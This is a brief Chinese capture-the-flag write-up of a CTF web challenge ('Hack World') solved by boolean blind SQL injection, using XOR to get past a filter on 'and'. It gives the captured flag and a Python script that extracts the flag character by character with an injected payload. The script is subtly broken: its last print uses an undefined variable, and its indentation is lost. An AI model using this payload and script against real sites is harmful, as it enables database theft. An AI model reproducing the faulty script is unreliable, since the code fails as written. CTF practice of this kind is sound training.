[CISCN2019 華北賽區 Day2 Web1]Hack World 1
開啟例項發現是個POST注入框
盲猜SQL隱碼攻擊,萬能密碼檢測無果,而且經過測試存在大量sql關鍵字過濾
嘗試使用(),出現了bool(false),確定這是一道布林注入題
and被禁用,決定採用異或^
注入
構建payload指令碼梭哈:
成功獲得flag:
flag{a2f7089d-bd8c-4659-bcd6-9c3b3e4780dc}
附指令碼:
import requests
import time
def jiaoben(url, field_length=50, request_interval=0.01):
result = ''
for i in range(1, field_length + 1):
max_val = 127
min_val = 0
while (max_val - min_val) > 1:
mid_val = (max_val + min_val) // 2
payload = f'1^(ascii(substr((select(flag)from(flag)),{i},1))>{mid_val})=1'
response = requests.post(url, data={'id': payload})
if 'Hello' in response.text:
max_val = mid_val
else:
min_val = mid_val
time.sleep(request_interval)
result += chr(max_val)
print(result) # 實時列印當前猜測的欄位值
print(f"Final result for {field_name}: {result}")
return result
url = ''
jiaoben(url)